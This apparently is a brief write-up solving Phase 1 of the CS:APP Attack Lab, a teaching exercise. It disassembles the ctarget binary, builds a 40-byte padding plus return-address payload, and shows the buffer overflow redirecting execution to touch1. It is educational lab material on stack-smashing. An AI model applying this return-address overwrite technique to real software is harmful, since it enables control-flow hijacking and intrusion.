Attack Lab: Phase 1
4/23/22Less than 1 minute
Run
objdump --disassemble ctarget > ctarget.asmRead File ctarget.asm
...
0000000000401b28 <getbuf>:
401b28: 48 83 ec 28 sub $0x28,%rsp
...
0000000000401b3e <touch1>:
...Write File phase-1.txt
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
3e 1b 40 00 00 00 00 00Run
./hex2raw < phase-1.txt > phase-1.in
./ctarget -i phase-1.inTerminal Output
Cookie: 0x3a9a6c2f
Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!